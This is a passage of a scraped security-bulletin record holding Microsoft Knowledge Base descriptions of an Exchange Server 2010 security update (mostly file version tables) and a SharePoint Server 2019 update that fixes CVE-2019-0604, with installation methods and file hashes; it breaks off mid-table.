154,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfwk.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgdsf.dll</td><td>8.5.3.76</td><td>89,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgif.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgzip.dll</td><td>8.5.3.76</td><td>37,216</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshgs.dll</td><td>8.5.3.76</td><td>50,016</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshtml.dll</td><td>8.5.3.76</td><td>517,984</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshwp.dll</td><td>8.5.3.76</td><td>91,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshwp2.dll</td><td>8.5.3.76</td><td>111,968</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsich.dll</td><td>8.5.3.76</td><td>136,032</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsich6.dll</td><td>8.5.3.76</td><td>62,816</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsid3.dll</td><td>8.5.3.76</td><td>53,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsimg.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsindd.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsinx.dll</td><td>8.5.3.76</td><td>21,344</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwok.dll</td><td>8.5.3.76</td><td>36,704</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwok13.dll</td><td>8.5.3.76</td><td>1,409,384</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwon.dll</td><td>8.5.3.76</td><td>70,496</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwop.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwp.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjbg2.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjp2.dll</td><td>8.5.3.76</td><td>249,184</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjw.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsleg.dll</td><td>8.5.3.76</td><td>41,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vslwp7.dll</td><td>8.5.3.76</td><td>360,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vslzh.dll</td><td>8.5.3.76</td><td>41,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsm11.dll</td><td>8.5.3.76</td><td>28,512</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmanu.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmbox.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmcw.dll</td><td>8.5.3.76</td><td>44,384</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmdb.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmif.dll</td><td>8.5.3.76</td><td>217,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmime.dll</td><td>8.5.3.76</td><td>135,008</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmm.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmm4.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmmfn.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmp.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmpp.dll</td><td>8.5.3.76</td><td>249,696</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmsg.dll</td><td>8.5.3.76</td><td>96,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmsw.dll</td><td>8.5.3.76</td><td>46,432</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwkd.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwks.dll</td><td>8.5.3.76</td><td>25,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwp2.dll</td><td>8.5.3.76</td><td>49,504</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwpf.dll</td><td>8.5.3.76</td><td>34,656</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwrk.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsnsf.dll</td><td>8.5.3.76</td><td>38,240</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsolm.dll</td><td>8.5.3.76</td><td>153,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsone.dll</td><td>8.5.3.76</td><td>81,760</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsow.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspbm.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspcl.dll</td><td>8.5.3.76</td><td>23,392</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspcx.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdf.dll</td><td>8.5.3.76</td><td>260,448</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdfi.dll</td><td>8.5.3.76</td><td>278,368</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdx.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspfs.dll</td><td>8.5.3.76</td><td>41,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspgl.dll</td><td>8.5.3.76</td><td>59,744</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspic.dll</td><td>8.5.3.76</td><td>25,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspict.dll</td><td>8.5.3.76</td><td>55,136</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspng.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspntg.dll</td><td>8.5.3.76</td><td>22,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp12.dll</td><td>8.5.3.76</td><td>131,936</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp2.dll</td><td>8.5.3.76</td><td>72,032</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp7.dll</td><td>8.5.3.76</td><td>77,664</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp97.dll</td><td>8.5.3.76</td><td>227,680</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsppl.dll</td><td>8.5.3.76</td><td>39,264</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspsd.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspsp6.dll</td><td>8.5.3.76</td><td>189,792</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspst.dll</td><td>8.5.3.76</td><td>82,272</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspstf.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqa.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqad.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqp6.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqp9.dll</td><td>8.5.3.76</td><td>76,128</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqt.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrar.dll</td><td>8.5.3.76</td><td>141,152</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsras.dll</td><td>8.5.3.76</td><td>24,416</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrbs.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrft.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrfx.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsriff.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrtf.dll</td><td>8.5.3.76</td><td>171,872</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssam.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssc5.dll</td><td>8.5.3.76</td><td>32,608</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssdw.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsshw3.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssmd.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssms.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssmt.dll</td><td>8.5.3.76</td><td>33,632</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssnap.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsso6.dll</td><td>8.5.3.76</td><td>306,016</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoc.dll</td><td>8.5.3.76</td><td>43,360</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoc6.dll</td><td>8.5.3.76</td><td>285,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoi.dll</td><td>8.5.3.76</td><td>40,800</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoi6.dll</td><td>8.5.3.76</td><td>304,992</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vssow.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsspt.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsssml.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsswf.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstaz.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstext.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstga.dll</td><td>8.5.3.76</td><td>26,976</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstif6.dll</td><td>8.5.3.76</td><td>103,776</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstw.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstxt.dll</td><td>8.5.3.76</td><td>38,752</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvcrd.dll</td><td>8.5.3.76</td><td>82,272</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsviso.dll</td><td>8.5.3.76</td><td>205,664</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvsdx.dll</td><td>8.5.3.76</td><td>47,456</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvw3.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw12.dll</td><td>8.5.3.76</td><td>221,536</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw6.dll</td><td>8.5.3.76</td><td>138,080</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw97.dll</td><td>8.5.3.76</td><td>236,896</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswbmp.dll</td><td>8.5.3.76</td><td>22,368</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswg2.dll</td><td>8.5.3.76</td><td>47,968</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswk4.dll</td><td>8.5.3.76</td><td>103,264</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswk6.dll</td><td>8.5.3.76</td><td>154,464</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswks.dll</td><td>8.5.3.76</td><td>48,480</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswm.dll</td><td>8.5.3.76</td><td>30,048</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswmf.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswml.dll</td><td>8.5.3.76</td><td>68,960</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsword.dll</td><td>8.5.3.76</td><td>86,880</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswork.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswp5.dll</td><td>8.5.3.76</td><td>75,616</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswp6.dll</td><td>8.5.3.76</td><td>107,360</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpf.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpg.dll</td><td>8.5.3.76</td><td>48,480</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpg2.dll</td><td>8.5.3.76</td><td>57,184</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpl.dll</td><td>8.5.3.76</td><td>39,264</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpml.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpw.dll</td><td>8.5.3.76</td><td>68,448</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsws.dll</td><td>8.5.3.76</td><td>37,728</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsws2.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxl12.dll</td><td>8.5.3.76</td><td>261,472</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxl5.dll</td><td>8.5.3.76</td><td>289,632</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxlsb.dll</td><td>8.5.3.76</td><td>244,064</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxml.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxmp.dll</td><td>8.5.3.76</td><td>22,368</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxps.dll</td><td>8.5.3.76</td><td>51,552</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxy.dll</td><td>8.5.3.76</td><td>35,680</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsyim.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vszip.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Watson.config.xml</td><td>Not applicable</td><td>36,442</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>143,640</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Web.config_cb9a6ac9d1164e879b0b2887c9452d4f</td><td>Not applicable</td><td>137,151</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyview.aspx</td><td>Not applicable</td><td>1,061</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyviewbody.aspx</td><td>Not applicable</td><td>1,292</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyviewhead.aspx</td><td>Not applicable</td><td>7,406</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Wizardproperties.js</td><td>Not applicable</td><td>189,547</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Wizcmd.exe</td><td>14.3.470.0</td><td>29,896</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Wsbexchange.exe</td><td>14.3.470.0</td><td>131,496</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Wvcore.dll</td><td>8.5.3.76</td><td>3,251,040</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>14.3.470.0</td><td>105,392</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>_02bdcebd3d694db585f8e38f74a7767e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_083c0d59e0a749f2b10174c00cb6727e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_24d2e35f00d7423c902e58d04c126642_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_3184a6f4759943848cf58593791ac971_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_3539f8afe1684c36847f808f0c76d024_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_486632cb7cbe412b8a2954012f7e9c7f_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_50ca03193abf48aca295b3ec864fcd68_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_545db0f907844150956a0c069a3a0556_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_5e224a55a0fa465e817e18cec8854723_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_64f60ad194cd4344bca49df649ac7b36_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_68e440eb9ffa4b54b3d7490524f7f878_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_6b0d5c59049a498aa09173d08300a443_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_71a730c62e764989bd2b2d205dd874b4_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_756c11efe6574dba874273443609eb8b_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_791aef9789df465da46941ee38757a31_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_7b9793f8_5acd_4ef8_83a6_46e957c909a0_error.aspx</td><td>Not applicable</td><td>8,363</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>_7e3dc44156954eacac20b5767cd0ebd7_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_81ebbb77ed854ee784951876098c52e9_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_9495e7eba02649c6a26bea7209a2f1e1_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_9e665be76e144ac89a7d8b37611b752e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Protect yourself online: <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/hub/4099151\" managed-link=\"\" target=\"_blank\">Windows Security support</a></p><p>Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" managed-link=\"\" target=\"_blank\">Microsoft Security</a></p></body></html>", "modified": "2020-02-13T16:33:55", "id": "KB4536989", "href": "https://support.microsoft.com/en-us/help/4536989/", "published": "2020-02-13T16:23:01", "title": "Description of the security update for Microsoft Exchange Server 2010: February 11, 2020", "type": "mskb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-14T00:48:31", "bulletinFamily": "microsoft", "description": "<html><body><p>Provides information about the SharePoint Server 2019 security update 4462199 that was released on March 12, 2019.</p><h2>Summary</h2><div>This security update resolves a\u00a0remote code execution vulnerability that exists in Microsoft SharePoint if the software does not check the source markup of an application package. To learn more about the vulnerability, see\u00a0Microsoft Common Vulnerabilities and Exposures\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604\" managed-link=\"\" target=\"\">CVE-2019-0604</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of\u00a0Microsoft SharePoint Server 2019\u00a0installed.</div><h2>Improvements and fixes</h2><div><p>Contains the following improvement and fixes:</p><ul><li>Adds support for the\u00a0new Japan era in SharePoint Server 2019.</li><li><p>Editing a project-level custom field while on a project detail page (PDP) cuases\u00a0lost task-level calculated custom field values if the field formula includes the task's Unique ID.</p></li><li>When you upload content to a document library, selecting a destination folder doesn't work. This issue occurs when you open the SharePoint site by using the Microsoft Edge browser.</li></ul></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462199\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=d43632da-bbbe-4ac2-8365-df209a207eae\" managed-link=\"\" target=\"\">Download security update 4462199 for the 64-bit version of SharePoint Server 2019</a></li></ul><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/20190312\" managed-link=\"\" target=\"_blank\">security update deployment information: March 12, 2019</a>.</p><h3>Security update replacement information</h3><p>This security update\u00a0replaces the\u00a0previously released update <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/4462171\" managed-link=\"\" target=\"_blank\">4462171</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>sts2019-kb4462199-fullfile-x64-glb.exe</td><td>937945CC1E08E4AB4F21E4A247C49668AE126373</td><td>FAF95F4A30627D176EC24E4B6AE7A817C21611C87FB59DCFA252059DC0FDB549</td></tr></tbody></table><h3><br/>File information</h3><p>The English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x64-based versions of SharePoint Server 2019</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>ascalc.dll</td><td>ascalc.dll</td><td>16.0.10342.12113</td><td>1001096</td><td>4-Mar-19</td><td>09:37</td></tr><tr><td>microsoft.office.access.server.application.dll</td><td>microsoft.office.access.server.application.dll</td><td>16.0.10342.12113</td><td>616792</td><td>4-Mar-19</td><td>09:37</td></tr><tr><td>accsrv.layouts.root.accsrvscripts.js</td><td>accessserverscripts.js</td><td>\u00a0</td><td>575536</td><td>4-Mar-19</td><td>09:36</td></tr><tr><td>conversion.chartserver.dll</td><td>chartserver.dll</td><td>16.0.10342.12113</td><td>16094320</td><td>4-Mar-19</td><td>09:28</td></tr><tr><td>ppt.conversion.chartserver.dll</td><td>chartserver.dll</td><td>16.0.10342.12113</td><td>16094320</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.chartserver.dll</td><td>chartserver.dll</td><td>16.0.10342.12113</td><td>16094320</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.chartserver.dll</td><td>chartserver.dll</td><td>16.0.10342.12113</td><td>16094320</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>prodfeat.xml</td><td>feature.xml</td><td>\u00a0</td><td>616</td><td>19-Feb-19</td><td>06:50</td></tr><tr><td>astcmmn_js</td><td>assetcommon.js</td><td>\u00a0</td><td>18255</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>astpkrs_js